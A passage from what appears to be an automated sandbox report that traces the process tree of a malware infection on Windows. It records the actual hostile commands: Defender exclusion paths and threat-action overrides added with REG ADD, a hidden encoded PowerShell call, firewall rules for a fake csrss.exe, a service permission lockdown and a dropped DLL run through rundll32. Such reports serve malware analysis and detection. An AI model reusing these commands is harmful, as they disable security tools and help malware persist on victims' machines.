                                                                          "C:\Users\Admin\Pictures\ftG7PNU93GqMIG0XdTYqud4b.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          PID:3556
                                                                        • C:\Users\Admin\Pictures\yhnOhDEwcb7FgbqN1ICvxKsr.exe
                                                                          "C:\Users\Admin\Pictures\yhnOhDEwcb7FgbqN1ICvxKsr.exe" /VERYSILENT
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:3704
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe" -Force
                                                                        2⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2840
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-2F4PP.tmp\yhnOhDEwcb7FgbqN1ICvxKsr.tmp
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-2F4PP.tmp\yhnOhDEwcb7FgbqN1ICvxKsr.tmp" /SL5="$C0152,831488,831488,C:\Users\Admin\Pictures\yhnOhDEwcb7FgbqN1ICvxKsr.exe" /VERYSILENT
                                                                      1⤵
                                                                        PID:4732
                                                                      • C:\Users\Admin\Pictures\mlb64NOLl5sxzm5WJbtT033Y.exe
                                                                        C:\Users\Admin\Pictures\mlb64NOLl5sxzm5WJbtT033Y.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6f739558,0x6f739564,0x6f739570
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:4312
                                                                      • C:\Users\Admin\Pictures\mlb64NOLl5sxzm5WJbtT033Y.exe
                                                                        "C:\Users\Admin\Pictures\mlb64NOLl5sxzm5WJbtT033Y.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2296 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240204034224" --session-guid=7cce2a32-0256-49f9-ac8d-59589a295419 --server-tracking-blob=Y2RhMjE5ZDVhZDA5MjY4ZTdkYzAzMDhmZWYxN2QxMTQ2N2QxZTExMDljNzUxMzMxMzNkNDc3OTYxZTExN2Y0Mzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNzAxODE0MC45NzkxIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIwYmExNmIxZC1kZmM5LTRhZDEtODlhNi00ZTNjMmQ1NDE3MWMifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=B004000000000000
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Enumerates connected drives
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:4224
                                                                        • C:\Users\Admin\Pictures\mlb64NOLl5sxzm5WJbtT033Y.exe
                                                                          C:\Users\Admin\Pictures\mlb64NOLl5sxzm5WJbtT033Y.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6e4c9558,0x6e4c9564,0x6e4c9570
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          PID:4168
                                                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\mlb64NOLl5sxzm5WJbtT033Y.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\mlb64NOLl5sxzm5WJbtT033Y.exe" --version
                                                                        1⤵
                                                                          PID:928
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                          1⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1880
                                                                          • C:\Windows\system32\gpupdate.exe
                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                            2⤵
                                                                              PID:1116
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                            1⤵
                                                                              PID:1988
                                                                            • \??\c:\windows\system32\gpscript.exe
                                                                              gpscript.exe /RefreshSystemParam
                                                                              1⤵
                                                                                PID:5112
                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                1⤵
                                                                                  PID:4920
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 228
                                                                                  1⤵
                                                                                  • Program crash
                                                                                  PID:4636
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 588
                                                                                  1⤵
                                                                                  • Program crash
                                                                                  PID:4236
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 680
                                                                                  1⤵
                                                                                  • Program crash
                                                                                  PID:5044
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 644
                                                                                  1⤵
                                                                                  • Program crash
                                                                                  PID:2828
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 776
                                                                                  1⤵
                                                                                  • Program crash
                                                                                  PID:4444
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -nologo -noprofile
                                                                                  1⤵
                                                                                    PID:2648
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 756
                                                                                    1⤵
                                                                                    • Program crash
                                                                                    PID:2960
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 632
                                                                                    1⤵
                                                                                    • Program crash
                                                                                    PID:316
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 376
                                                                                    1⤵
                                                                                    • Program crash
                                                                                    PID:2836
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 360
                                                                                    1⤵
                                                                                    • Program crash
                                                                                    PID:2624
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                                    1⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:4064
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                                    1⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:1112
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    1⤵
                                                                                      PID:4916
                                                                                    • C:\Windows\windefender.exe
                                                                                      C:\Windows\windefender.exe
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in System32 directory
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4728
                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                      sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                      1⤵
                                                                                      • Launches sc.exe
                                                                                      PID:4316
                                                                                    • C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\ONCbteG.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\ONCbteG.exe cj /kAsite_idzXl 385118 /S
                                                                                      1⤵
                                                                                        PID:4956
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                          2⤵
                                                                                            PID:4584
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                              3⤵
                                                                                                PID:1544
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                3⤵
                                                                                                  PID:2832
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                  3⤵
                                                                                                    PID:2084
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                    3⤵
                                                                                                      PID:4100
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                      3⤵
                                                                                                        PID:3208
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                        3⤵
                                                                                                          PID:4036
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                          3⤵
                                                                                                            PID:4148
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                            3⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2388
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                            3⤵
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:5052
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                            3⤵
                                                                                                              PID:4080
                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                c:\windows\system32\rundll32.EXE "C:\Windows\Temp\RZfGRCgJsrDIEOco\WMHlLqqk\yHwbNSt.dll",#1 /Lcsite_idnqK 385118
                                                                                                                4⤵
                                                                                                                • Blocklisted process makes network request
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Loads dropped DLL
                                                                                                                • Drops file in System32 directory
                                                                                                                • Enumerates system info in registry
                                                                                                                PID:1044
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /DELETE /F /TN "EtrQGzrpWMpnyWxNE"
                                                                                                                  5⤵
                                                                                                                    PID:4308
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      6⤵
                                                                                                                        PID:5108
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:4112
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:4680
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:5008
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:884
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:2340
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:4620
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:4644
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:5012
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:68
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:4932
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:4084
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:4340
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:4424
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:4972
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:3536
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:4316
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:4588
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1836
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FohpjzYDshfCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FohpjzYDshfCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IoHaAJhEDYhU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IoHaAJhEDYhU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KCGdmeQdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KCGdmeQdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hgFvgKbJayUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hgFvgKbJayUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uqeRQcQeSVSWnHVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uqeRQcQeSVSWnHVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RZfGRCgJsrDIEOco\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RZfGRCgJsrDIEOco\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                  2⤵
                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                  • Modifies data under HKEY_USERS
